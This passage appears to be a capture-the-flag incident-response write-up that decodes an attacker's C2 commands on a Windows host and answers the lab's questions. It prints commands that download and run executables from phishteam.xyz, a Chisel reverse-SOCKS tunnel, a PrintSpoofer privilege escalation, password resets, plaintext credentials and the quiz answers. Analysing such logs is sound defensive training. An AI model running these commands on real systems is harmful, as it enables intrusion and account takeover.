ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCmQtci0tLSAgICAgICAgNi8yMC8yMDIyICAgNDoxMyBQTSAgICAgICAgICAgICAgICBQaWN0dXJlcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KZC1yLS0tICAgICAgICA2LzIwLzIwMjIgICA0OjEzIFBNICAgICAgICAgICAgICAgIFNhdmVkIEdhbWVzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQpkLXItLS0gICAgICAgIDYvMjAvMjAyMiAgIDQ6MTMgUE0gICAgICAgICAgICAgICAgU2VhcmNoZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCmQtci0tLSAgICAgICAgNi8yMC8yMDIyICAgNTo1NyBQTSAgICAgICAgICAgICAgICBWaWRlb3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KDQoNCg==

dir C:\Users\benimaru - 

    Directory: C:\Users\benimaru


Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
d-r---        6/20/2022   4:13 PM                3D Objects                                                             
d-r---        6/20/2022   4:13 PM                Contacts                                                               
d-r---        6/21/2022  12:27 AM                Desktop                                                                
d-r---        6/20/2022   9:20 PM                Documents                                                              
d-r---        6/21/2022   1:13 AM                Downloads                                                              
d-r---        6/20/2022   4:13 PM                Favorites                                                              
d-r---        6/20/2022   4:13 PM                Links                                                                  
d-r---        6/20/2022   4:13 PM                Music                                                                  
dar---        6/21/2022   1:15 AM                OneDrive                                                               
d-r---        6/20/2022   4:13 PM                Pictures                                                               
d-r---        6/20/2022   4:13 PM                Saved Games                                                            
d-r---        6/20/2022   4:13 PM                Searches                                                               
d-r---        6/20/2022   5:57 PM                Videos   

ZGlyIEM6XFVzZXJzXGJlbmltYXJ1XGRvY3VtZW50cyAtIA==

dir C:\Users\benimaru\documents - 

ZGlyIEM6XHVzZXJzXGJlbmltYXJ1XERlc2t0b3AgLSANCg0KICAgIERpcmVjdG9yeTogQzpcdXNlcnNcYmVuaW1hcnVcRGVza3RvcA0KDQoNCk1vZGUgICAgICAgICAgICAgICAgTGFzdFdyaXRlVGltZSAgICAgICAgIExlbmd0aCBOYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KLS0tLSAgICAgICAgICAgICAgICAtLS0tLS0tLS0tLS0tICAgICAgICAgLS0tLS0tIC0tLS0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQotYS0tLS0gICAgICAgIDYvMjAvMjAyMiAgMTE6MzQgUE0gICAgICAgICAgICAyNjggYXV0b21hdGlvbi5wczEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCi1hLS0tLSAgICAgICAgNi8yMC8yMDIyICAgNDoxMyBQTSAgICAgICAgICAgMTQ0NiBNaWNyb3NvZnQgRWRnZS5sbmsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KDQoNCg==

dir C:\users\benimaru\Desktop - 

    Directory: C:\users\benimaru\Desktop


Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
-a----        6/20/2022  11:34 PM            268 automation.ps1                                                         
-a----        6/20/2022   4:13 PM           1446 Microsoft Edge.lnk        

Y2F0IEM6XFVzZXJzXEJlbmltYXJ1XERlc2t0b3BcYXV0b21hdGlvbi5wczEgLSAkdXNlciA9ICJURU1QRVNUXGJlbmltYXJ1Ig0KJHBhc3MgPSAiaW5mZXJub3RlbXBlc3QiDQoNCiRzZWN1cmVQYXNzd29yZCA9IENvbnZlcnRUby1TZWN1cmVTdHJpbmcgJHBhc3MgLUFzUGxhaW5UZXh0IC1Gb3JjZTsNCiRjcmVkZW50aWFsID0gTmV3LU9iamVjdCBTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLlBTQ3JlZGVudGlhbCAkdXNlciwgJHNlY3VyZVBhc3N3b3JkDQoNCiMjIFRPRE86IEF1dG9tYXRlIGVhc3kgdGFza3MgdG8gaGFjayB3b3JraW5nIGhvdXJzDQo=

cat C:\Users\Benimaru\Desktop\automation.ps1 - $user = "TEMPEST\benimaru"
$pass = "infernotempest"

$securePassword = ConvertTo-SecureString $pass -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $user, $securePassword

## TODO: Automate easy tasks to hack working hours

bmV0c3RhdCAtYW5vIC1wIHRjcCAtIA0KQWN0aXZlIENvbm5lY3Rpb25zDQoNCiAgUHJvdG8gIExvY2FsIEFkZHJlc3MgICAgICAgICAgRm9yZWlnbiBBZGRyZXNzICAgICAgICBTdGF0ZSAgICAgICAgICAgUElEDQogIFRDUCAgICAwLjAuMC4wOjEzNSAgICAgICAgICAgIDAuMC4wLjA6MCAgICAgICAgICAgICAgTElTVEVOSU5HICAgICAgIDg2NA0KICBUQ1AgICAgMC4wLjAuMDo0NDUgICAgICAgICAgICAwLjAuMC4wOjAgICAgICAgICAgICAgIExJU1RFTklORyAgICAgICA0DQogIFRDUCAgICAwLjAuMC4wOjUwNDAgICAgICAgICAgIDAuMC4wLjA6MCAgICAgICAgICAgICAgTElTVEVOSU5HICAgICAgIDU1MDgNCiAgVENQICAgIDAuMC4wLjA6NTM1NyAgICAgICAgICAgMC4wLjAuMDowICAgICAgICAgICAgICBMSVNURU5JTkcgICAgICAgNA0KICBUQ1AgICAgMC4wLjAuMDo1OTg1ICAgICAgICAgICAwLjAuMC4wOjAgICAgICAgICAgICAgIExJU1RFTklORyAgICAgICA0DQogIFRDUCAgICAwLjAuMC4wOjc2ODAgICAgICAgICAgIDAuMC4wLjA6MCAgICAgICAgICAgICAgTElTVEVOSU5HICAgICAgIDQ5NjQNCiAgVENQICAgIDAuMC4wLjA6NDcwMDEgICAgICAgICAgMC4wLjAuMDowICAgICAgICAgICAgICBMSVNURU5JTkcgICAgICAgNA0KICBUQ1AgICAgMC4wLjAuMDo0OTY2NCAgICAgICAgICAwLjAuMC4wOjAgICAgICAgICAgICAgIExJU1RFTklORyAgICAgICA0NzYNCiAgVENQICAgIDAuMC4wLjA6NDk2NjUgICAgICAgICAgMC4wLjAuMDowICAgICAgICAgICAgICBMSVNURU5JTkcgICAgICAgMTIxMg0KICBUQ1AgICAgMC4wLjAuMDo0OTY2NiAgICAgICAgICAwLjAuMC4wOjAgICAgICAgICAgICAgIExJU1RFTklORyAgICAgICAxNzYwDQogIFRDUCAgICAwLjAuMC4wOjQ5NjY3ICAgICAgICAgIDAuMC4wLjA6MCAgICAgICAgICAgICAgTElTVEVOSU5HICAgICAgIDI0MjQNCiAgVENQICAgIDAuMC4wLjA6NDk2NzEgICAgICAgICAgMC4wLjAuMDowICAgICAgICAgICAgICBMSVNURU5JTkcgICAgICAgNjI0DQogIFRDUCAgICAwLjAuMC4wOjQ5Njc2ICAgICAgICAgIDAuMC4wLjA6MCAgICAgICAgICAgICAgTElTVEVOSU5HICAgICAgIDYwOA0KICBUQ1AgICAgMTkyLjE2OC4yNTQuMTA3OjEzOSAgICAwLjAuMC4wOjAgICAgICAgICAgICAgIExJU1RFTklORyAgICAgICA0DQogIFRDUCAgICAxOTIuMTY4LjI1NC4xMDc6NTE4MDIgIDUyLjEzOS4yNTAuMjUzOjQ0MyAgICAgRVNUQUJMSVNIRUQgICAgIDMyMTYNCiAgVENQICAgIDE5Mi4xNjguMjU0LjEwNzo1MTgzOSAgMzQuMTA0LjM1LjEyMzo4MCAgICAgICBUSU1FX1dBSVQgICAgICAgMA0KICBUQ1AgICAgMTkyLjE2OC4yNTQuMTA3OjUxODU4ICAxMDQuMTAxLjIyLjEyODo4MCAgICAgIFRJTUVfV0FJVCAgICAgICAwDQogIFRDUCAgICAxOTIuMTY4LjI1NC4xMDc6NTE4NjAgIDIwLjIwNS4xNDYuMTQ5OjQ0MyAgICAgVElNRV9XQUlUICAgICAgIDANCiAgVENQICAgIDE5Mi4xNjguMjU0LjEwNzo1MTg2MSAgMjA0Ljc5LjE5Ny4yMDA6NDQzICAgICBFU1RBQkxJU0hFRCAgICAgNDM1Mg0KICBUQ1AgICAgMTkyLjE2OC4yNTQuMTA3OjUxODcxICAyMC4xOTAuMTQ0LjE2OTo0NDMgICAgIFRJTUVfV0FJVCAgICAgICAwDQogIFRDUCAgICAxOTIuMTY4LjI1NC4xMDc6NTE4NzYgIDUyLjE3OC4xNy4yOjQ0MyAgICAgICAgRVNUQUJMSVNIRUQgICAgIDQzODgNCiAgVENQICAgIDE5Mi4xNjguMjU0LjEwNzo1MTg3OCAgMjAuNjAuMTc4LjM2OjQ0MyAgICAgICBFU1RBQkxJU0hFRCAgICAgNDM4OA0KICBUQ1AgICAgMTkyLjE2OC4yNTQuMTA3OjUxODgxICA1Mi4xMDkuMTI0LjExNTo0NDMgICAgIEVTVEFCTElTSEVEICAgICA0Mzg4DQogIFRDUCAgICAxOTIuMTY4LjI1NC4xMDc6NTE4ODIgIDUyLjEzOS4xNTQuNTU6NDQzICAgICAgRVNUQUJMSVNIRUQgICAgIDQzODgNCiAgVENQICAgIDE5Mi4xNjguMjU0LjEwNzo1MTg4NCAgNDAuMTE5LjIxMS4yMDM6NDQzICAgICBFU1RBQkxJU0hFRCAgICAgNDM4OA0KICBUQ1AgICAgMTkyLjE2OC4yNTQuMTA3OjUxODk1ICA1Mi4xNTIuOTAuMTcyOjQ0MyAgICAgIEVTVEFCTElTSEVEICAgICA1NTA4DQogIFRDUCAgICAxOTIuMTY4LjI1NC4xMDc6NTE4OTYgIDIwLjQ0LjIyOS4xMTI6NDQzICAgICAgRVNUQUJMSVNIRUQgICAgIDg5MDQNCg==

netstat -ano -p tcp - 
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       864
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       5508
  TCP    0.0.0.0:5357           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:7680           0.0.0.0:0              LISTENING       4964
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       476
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       1212
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1760
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       2424
  TCP    0.0.0.0:49671          0.0.0.0:0              LISTENING       624
  TCP    0.0.0.0:49676          0.0.0.0:0              LISTENING       608
  TCP    192.168.254.107:139    0.0.0.0:0              LISTENING       4
  TCP    192.168.254.107:51802  52.139.250.253:443     ESTABLISHED     3216
  TCP    192.168.254.107:51839  34.104.35.123:80       TIME_WAIT       0
  TCP    192.168.254.107:51858  104.101.22.128:80      TIME_WAIT       0
  TCP    192.168.254.107:51860  20.205.146.149:443     TIME_WAIT       0
  TCP    192.168.254.107:51861  204.79.197.200:443     ESTABLISHED     4352
  TCP    192.168.254.107:51871  20.190.144.169:443     TIME_WAIT       0
  TCP    192.168.254.107:51876  52.178.17.2:443        ESTABLISHED     4388
  TCP    192.168.254.107:51878  20.60.178.36:443       ESTABLISHED     4388
  TCP    192.168.254.107:51881  52.109.124.115:443     ESTABLISHED     4388
  TCP    192.168.254.107:51882  52.139.154.55:443      ESTABLISHED     4388
  TCP    192.168.254.107:51884  40.119.211.203:443     ESTABLISHED     4388
  TCP    192.168.254.107:51895  52.152.90.172:443      ESTABLISHED     5508
  TCP    192.168.254.107:51896  20.44.229.112:443      ESTABLISHED     8904

cG93ZXJzaGVsbCBpd3IgaHR0cDovL3BoaXNodGVhbS54eXovMDJkY2YwNy9jaC5leGUgLW91dGZpbGUgQzpcVXNlcnNcYmVuaW1hcnVcRG93bmxvYWRzXGNoLmV4ZSAtIA==

powershell iwr http://phishteam.xyz/02dcf07/ch.exe -outfile C:\Users\benimaru\Downloads\ch.exe - 

ZGlyIEM6XFVzZXJzXGJlbmltYXJ1XERvd25sb2Fkc1xjaC5leGUgLSANCg0KICAgIERpcmVjdG9yeTogQzpcVXNlcnNcYmVuaW1hcnVcRG93bmxvYWRzDQoNCg0KTW9kZSAgICAgICAgICAgICAgICBMYXN0V3JpdGVUaW1lICAgICAgICAgTGVuZ3RoIE5hbWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgIC0tLS0tLS0tLS0tLS0gICAgICAgICAtLS0tLS0gLS0tLSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICANCi1hLS0tLSAgICAgICAgNi8yMS8yMDIyICAgMToxNyBBTSAgICAgICAgODIzMDkxMiBjaC5leGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA0KDQoNCg==

dir C:\Users\benimaru\Downloads\ch.exe - 

    Directory: C:\Users\benimaru\Downloads


Mode                LastWriteTime         Length Name                                                                   
----                -------------         ------ ----                                                                   
-a----        6/21/2022   1:17 AM        8230912 ch.exe                                                                 

that's all :)

search ch.exe

"C:\Users\benimaru\Downloads\ch.exe" client 167.71.199.191:8080 R:socks

MD5=527C71C523D275C8367B67BBEBF48E9F,SHA256=8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451,IMPHASH=C7269D59926FA4252270F407E4DAB043

https://www.virustotal.com/gui/file/8a99353662ccae117d2bb22efd8c43d7169060450be413af763e8ad7522d2451

C:\Windows\system32\wsmprovhost.exe -Embedding

https://research.splunk.com/endpoint/2eed004c-4c0d-11ec-93e8-3e22fbd008af/

evilwinrm

The attacker was able to discover a sensitive file inside the machine of the user. What is the password discovered on the aforementioned file?

infernotempest

The attacker then enumerated the list of listening ports inside the machine. What is the listening port that could provide a remote shell inside the machine?

5985

The attacker then established a reverse socks proxy to access the internal services hosted inside the machine. What is the command executed by the attacker to establish the connection?

Format: Remove the double quotes from the log.

*"C:\Users\benimaru\Downloads\ch.exe" client 167.71.199.191:8080 R:socks*

What is the SHA256 hash of the binary used by the attacker to establish the reverse socks proxy connection?

8A99353662CCAE117D2BB22EFD8C43D7169060450BE413AF763E8AD7522D2451

What is the name of the tool used by the attacker based on the SHA256 hash? Provide the answer in lowercase.

External research needed. Use the SHA256 hash to determine the name of the tool.

Chisel

The attacker then used the harvested credentials from the machine. Based on the succeeding process after the execution of the socks proxy, what service did the attacker use to authenticate?

Format: Answer in lowercase

External research needed. Use the process name to determine the service name.

WinRm

Privilege Escalation - Exploiting Privileges

Privilege Escalation

Based on the collected findings, the attacker gained a stable shell through a reverse socks proxy.

Investigation Guide

With this, we can focus on the following network and endpoint events:

Look for events executed after the successful execution of the reverse socks proxy tool.
Look for potential privilege escalation attempts, as the attacker has already established a persistent low-privilege access.

Significant Data Sources:

Packet Capture
Sysmon

Answer the questions below

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iwr http://phishteam.xyz/02dcf07/spf.exe -outfile spf.exe

search spf.exe

MD5=108DA75DE148145B8F056EC0827F1665,SHA256=8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D,IMPHASH=545A81240793F9CA97306FA5B3AD76DF

https://www.virustotal.com/gui/file/8524fbc0d73e711e69d60c64f1f1b7bef35c986705880643dd4d5e17779e586d

looks like the same steps I'd done it :)

from clement
https://github.com/itm4n/PrintSpoofer

"C:\Users\benimaru\Downloads\spf.exe" -c C:\ProgramData\final.exe

After discovering the privileges of the current user, the attacker then downloaded another binary to be used for privilege escalation. What is the name and the SHA256 hash of the binary?

Format: binary name,SHA256 hash

spf.exe,8524FBC0D73E711E69D60C64F1F1B7BEF35C986705880643DD4D5E17779E586D

Based on the SHA256 hash of the binary, what is the name of the tool used?

Format: Answer in lowercase

External research needed. Use the SHA256 hash to determine the name of the exact tool used.

PrintSpoofer

The tool exploits a specific privilege owned by the user. What is the name of the privilege?

External research needed. Read about the tool to see the privilege being abused.

SeImpersonatePrivilege

Then, the attacker executed the tool with another binary to establish a c2 connection. What is the name of the binary?

final.exe

The binary connects to a different port from the first c2 connection. What is the port used?

8080

Actions on Objective - Fully-owned Machine

Fully-Owned Machine

Now, the attacker has gained administrative privileges inside the machine. Find all persistence techniques used by the attacker.

In addition, the unusual executions are related to the malicious C2 binary used during privilege escalation.

Investigation Guide

Now, we can rely on our cheatsheet to investigate events after a successful privilege escalation:

Useful Brim filter to get all HTTP requests related to the malicious C2 traffic : _path=="http" "<replace domain>" id.resp_p==<replace port> | cut ts, host, id.resp_p, uri | sort ts
The attacker gained SYSTEM privileges; now, the user context for each malicious execution blends with NT Authority\System.
All child events of the new malicious binary used for C2 are worth checking.

Significant Data Sources:

Packet Capture
Sysmon
Windows Event Logs

Answer the questions below

_path=="http" "resolvecyber.xyz" id.resp_p==8080 | cut ts, host, id.resp_p, uri | sort ts

d2hvYW1pIC0gbnQgYXV0aG9yaXR5XHN5c3RlbQ0K

whoami - nt authority\system

cHdkIC0gDQpQYXRoICAgICAgICAgICAgICAgDQotLS0tICAgICAgICAgICAgICAgDQpDOlxXaW5kb3dzXHN5c3RlbTMyDQoNCg0K

pwd - 
Path               
----               
C:\Windows\system32

bmV0IHVzZXIgc2h1bmEgcHJpbmNlc3MgLSA=

net user shuna princess - 

bmV0IHVzZXJzIC0gDQpVc2VyIGFjY291bnRzIGZvciBcXA0KDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpBZG1pbmlzdHJhdG9yICAgICAgICAgICAgYmVuaW1hcnUgICAgICAgICAgICAgICAgIERlZmF1bHRBY2NvdW50ICAgICAgICAgICANCkd1ZXN0ICAgICAgICAgICAgICAgICAgICByaW11cnUgICAgICAgICAgICAgICAgICAgV0RBR1V0aWxpdHlBY2NvdW50ICAgICAgIA0KVGhlIGNvbW1hbmQgY29tcGxldGVkIHdpdGggb25lIG9yIG1vcmUgZXJyb3JzLg0KDQo=

net users - 
User accounts for \\

-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount           
Guest                    rimuru                   WDAGUtilityAccount       
The command completed with one or more errors.

bmV0IHVzZXIgc2h1bmEgLSA=

net user shuna - 

bmV0IHVzZXIgc2h1bmEgcHIxbmMzc3MhIC0g

net user shuna pr1nc3ss! - 

bmV0IHVzZXJzIC0gDQpVc2VyIGFjY291bnRzIGZvciBcXA0KDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpBZG1pbmlzdHJhdG9yICAgICAgICAgICAgYmVuaW1hcnUgICAgICAgICAgICAgICAgIERlZmF1bHRBY2NvdW50ICAgICAgICAgICANCkd1ZXN0ICAgICAgICAgICAgICAgICAgICByaW11cnUgICAgICAgICAgICAgICAgICAgV0RBR1V0aWxpdHlBY2NvdW50ICAgICAgIA0KVGhlIGNvbW1hbmQgY29tcGxldGVkIHdpdGggb25lIG9yIG1vcmUgZXJyb3JzLg0KDQo=

net users - 
User accounts for \\

-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount           
Guest                    rimuru                   WDAGUtilityAccount       
The command completed with one or more errors.

bmV0IHVzZXIgc2hpb24gbTRzdDNyY2gzZiEgLSA=

net user shion m4st3rch3f! - 

bmV0IHVzZXJzIC0gDQpVc2VyIGFjY291bnRzIGZvciBcXA0KDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpBZG1pbmlzdHJhdG9yICAgICAgICAgICAgYmVuaW1hcnUgICAgICAgICAgICAgICAgIERlZmF1bHRBY2NvdW50ICAgICAgICAgICANCkd1ZXN0ICAgICAgICAgICAgICAgICAgICByaW11cnUgICAgICAgICAgICAgICAgICAgV0RBR1V0aWxpdHlBY2NvdW50ICAgICAgIA0KVGhlIGNvbW1hbmQgY29tcGxldGVkIHdpdGggb25lIG9yIG1vcmUgZXJyb3JzLg0KDQo=

net users - 
User accounts for \\

-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount           
Guest                    rimuru                   WDAGUtilityAccount       
The command completed with one or more errors.

bmV0IHVzZXIgQWRtaW5pc3RyYXRvciBjaDRuZzNkcGFzc3dvcmQhIC0gVGhlIGNvbW1hbmQgY29tcGxldGVkIHN1Y2Nlc3NmdWxseS4NCg0K

net user Administrator ch4ng3dpassword! - The command completed successfully.

Y21kLmV4ZSAvYyBuZXQgdXNlciBzaGlvbiBtNHN0M3JjaDNmISEhIC0g

cmd.exe /c net user shion m4st3rch3f!!! - 

bmV0IHVzZXJzIC0gDQpVc2VyIGFjY291bnRzIGZvciBcXA0KDQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpBZG1pbmlzdHJhdG9yICAgICAgICAgICAgYmVuaW1hcnUgICAgICAgICAgICAgICAgIERlZmF1bHRBY2NvdW50ICAgICAgICAgICANCkd1ZXN0ICAgICAgICAgICAgICAgICAgICByaW11cnUgICAgICAgICAgICAgICAgICAgV0RBR1V0aWxpdHlBY2NvdW50ICAgICAgIA0KVGhlIGNvbW1hbmQgY29tcGxldGVkIHdpdGggb25lIG9yIG1vcmUgZXJyb3JzLg0KDQo=

net users - 
User accounts for \\

-------------------------------------------------------------------------------
Administrator            benimaru                 DefaultAccount           
Guest                    rimuru                   WDAGUtilityAccount       
The command completed with one or more errors.


d2hvYW1pIC9wcml2IC0gDQpQUklWSUxFR0VTIElORk9STUFUSU9ODQotLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNClByaXZpbGVnZSBOYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgIERlc2NyaXB0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTdGF0ZSAgDQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PSA9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0gPT09PT09PQ0KU2VDcmVhdGVUb2tlblByaXZpbGVnZSAgICAgICAgICAgICAgICAgICAgQ3JlYXRlIGEgdG9rZW4gb2JqZWN0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlQXNzaWduUHJpbWFyeVRva2VuUHJpdmlsZWdlICAgICAgICAgICAgIFJlcGxhY2UgYSBwcm9jZXNzIGxldmVsIHRva2VuICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZUxvY2tNZW1vcnlQcml2aWxlZ2UgICAgICAgICAgICAgICAgICAgICBMb2NrIHBhZ2VzIGluIG1lbW9yeSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VJbmNyZWFzZVF1b3RhUHJpdmlsZWdlICAgICAgICAgICAgICAgICAgQWRqdXN0IG1lbW9yeSBxdW90YXMgZm9yIGEgcHJvY2VzcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlVGNiUHJpdmlsZWdlICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdCBhcyBwYXJ0IG9mIHRoZSBvcGVyYXRpbmcgc3lzdGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZVNlY3VyaXR5UHJpdmlsZWdlICAgICAgICAgICAgICAgICAgICAgICBNYW5hZ2UgYXVkaXRpbmcgYW5kIHNlY3VyaXR5IGxvZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VUYWtlT3duZXJzaGlwUHJpdmlsZWdlICAgICAgICAgICAgICAgICAgVGFrZSBvd25lcnNoaXAgb2YgZmlsZXMgb3Igb3RoZXIgb2JqZWN0cyAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlTG9hZERyaXZlclByaXZpbGVnZSAgICAgICAgICAgICAgICAgICAgIExvYWQgYW5kIHVubG9hZCBkZXZpY2UgZHJpdmVycyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZVN5c3RlbVByb2ZpbGVQcml2aWxlZ2UgICAgICAgICAgICAgICAgICBQcm9maWxlIHN5c3RlbSBwZXJmb3JtYW5jZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VTeXN0ZW10aW1lUHJpdmlsZWdlICAgICAgICAgICAgICAgICAgICAgQ2hhbmdlIHRoZSBzeXN0ZW0gdGltZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlUHJvZmlsZVNpbmdsZVByb2Nlc3NQcml2aWxlZ2UgICAgICAgICAgIFByb2ZpbGUgc2luZ2xlIHByb2Nlc3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZUluY3JlYXNlQmFzZVByaW9yaXR5UHJpdmlsZWdlICAgICAgICAgICBJbmNyZWFzZSBzY2hlZHVsaW5nIHByaW9yaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VDcmVhdGVQYWdlZmlsZVByaXZpbGVnZSAgICAgICAgICAgICAgICAgQ3JlYXRlIGEgcGFnZWZpbGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlQ3JlYXRlUGVybWFuZW50UHJpdmlsZWdlICAgICAgICAgICAgICAgIENyZWF0ZSBwZXJtYW5lbnQgc2hhcmVkIG9iamVjdHMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZUJhY2t1cFByaXZpbGVnZSAgICAgICAgICAgICAgICAgICAgICAgICBCYWNrIHVwIGZpbGVzIGFuZCBkaXJlY3RvcmllcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VSZXN0b3JlUHJpdmlsZWdlICAgICAgICAgICAgICAgICAgICAgICAgUmVzdG9yZSBmaWxlcyBhbmQgZGlyZWN0b3JpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlU2h1dGRvd25Qcml2aWxlZ2UgICAgICAgICAgICAgICAgICAgICAgIFNodXQgZG93biB0aGUgc3lzdGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZURlYnVnUHJpdmlsZWdlICAgICAgICAgICAgICAgICAgICAgICAgICBEZWJ1ZyBwcm9ncmFtcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VBdWRpdFByaXZpbGVnZSAgICAgICAgICAgICAgICAgICAgICAgICAgR2VuZXJhdGUgc2VjdXJpdHkgYXVkaXRzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlU3lzdGVtRW52aXJvbm1lbnRQcml2aWxlZ2UgICAgICAgICAgICAgIE1vZGlmeSBmaXJtd2FyZSBlbnZpcm9ubWVudCB2YWx1ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZUNoYW5nZU5vdGlmeVByaXZpbGVnZSAgICAgICAgICAgICAgICAgICBCeXBhc3MgdHJhdmVyc2UgY2hlY2tpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VVbmRvY2tQcml2aWxlZ2UgICAgICAgICAgICAgICAgICAgICAgICAgUmVtb3ZlIGNvbXB1dGVyIGZyb20gZG9ja2luZyBzdGF0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVuYWJsZWQNClNlTWFuYWdlVm9sdW1lUHJpdmlsZWdlICAgICAgICAgICAgICAgICAgIFBlcmZvcm0gdm9sdW1lIG1haW50ZW5hbmNlIHRhc2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFbmFibGVkDQpTZUltcGVyc29uYXRlUHJpdmlsZWdlICAgICAgICAgICAgICAgICAgICBJbXBlcnNvbmF0ZSBhIGNsaWVudCBhZnRlciBhdXRoZW50aWNhdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgRW5hYmxlZA0KU2VDcmVhdGVHbG9iYWxQcml2aWxlZ2UgICAgICAgICAgICAgICAgICAgQ3JlYXRlIGds